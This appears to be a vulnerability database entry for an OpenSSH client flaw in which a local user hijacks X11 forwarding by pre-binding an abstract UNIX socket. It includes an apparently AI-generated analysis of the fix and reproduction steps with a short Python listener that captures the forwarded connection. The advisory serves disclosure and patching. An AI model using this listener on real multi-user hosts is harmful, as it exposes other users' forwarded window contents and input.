Openssh: local mitm of x11 forwarding via abstract unix socket pre-binding in red hat enterprise linux openssh client versions
Description
A flaw was found in OpenSSH. A local unprivileged attacker on a Linux client host can hijack client-side X11 forwarding connections. This is possible by pre-binding the preferred abstract X socket name when X11 forwarding is enabled and a local UNIX-domain X socket is used. A successful attack can compromise the confidentiality of forwarded X11 traffic, including sensitive window contents and input, and may allow some manipulation of the forwarded session.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"OpenSSH client's `connect_local_xsocket()` tries the Linux abstract UNIX socket before the filesystem socket, allowing an unprivileged local attacker to pre-bind the abstract name and hijack the forwarded X11 connection."
Attack vector
A local unprivileged attacker on the Linux client host pre-binds the abstract UNIX socket name (e.g. `\0/tmp/.X11-unix/X0`) before the OpenSSH client opens a forwarded X11 connection. Because Linux abstract UNIX sockets lack filesystem permission mediation, the attacker's listener receives the forwarded X11 session before the legitimate filesystem socket is tried. The attacker can then intercept forwarded X11 traffic, including sensitive window contents and input, and may substitute saved X11 authentication data into the hijacked stream [ref_id=1].
What the fix does
The proposed patch reverses the connection order in `connect_local_xsocket()`: the filesystem socket (`/tmp/.X11-unix/X%u`) is tried first, and the Linux abstract socket is retained only as a compatibility fallback [ref_id=1]. This closes the vulnerability because the filesystem socket is mediated by standard UNIX permissions and ownership, preventing an unprivileged local attacker from pre-binding it. The diff swaps the two `connect_local_xsocket_path()` calls and moves the `#ifdef linux` block after the filesystem attempt.
Preconditions
- authLocal unprivileged code execution on the Linux host running the OpenSSH client
- configClient-side X11 forwarding enabled (`-X`, `-Y`, or equivalent configuration)
- configLocal DISPLAY resolves to a UNIX-domain X socket such as `:0` or `unix:0`
- inputA forwarded X11 connection must be opened while the attacker has pre-bound the matching abstract socket name
Reproduction
1. On a Linux system running the OpenSSH client, confirm the local display uses a UNIX-domain socket such as `:0` or `unix:0`. 2. Before opening a forwarded X11 connection, start a local unprivileged listener bound to the matching abstract socket name. For display `:0`: ```python import socket s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) s.bind("\0/tmp/.X11-unix/X0") s.listen(1) c, _ = s.accept() print("accepted; first bytes:", c.recv(64).hex()) ``` 3. In another terminal, start an SSH session with X11 forwarding enabled: ```bash ssh -X user@remote ``` 4. From the remote shell, trigger an X11 application so that the client opens the forwarded X11 channel, for example: ```bash xclock ``` 5. Observe that the attacker listener accepts the connection and receives the initial X11 bytes before the legitimate filesystem socket `/tmp/.X11-unix/X0` is used. 6. Optional confirmation: ```bash strace -f -e connect ssh -X user@remote ``` Expected result: tracing shows a successful `AF_UNIX` connect to the abstract socket name `\0/tmp/.X11-unix/X0` before any successful connect to `/tmp/.X11-unix/X0`.
Generated on Jun 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- access.redhat.com/security/cve/CVE-2026-55655mitrevdb-entryx_refsource_REDHAT
- bugzilla.redhat.com/show_bug.cgimitreissue-trackingx_refsource_REDHAT
News mentions
0No linked articles in our index yet.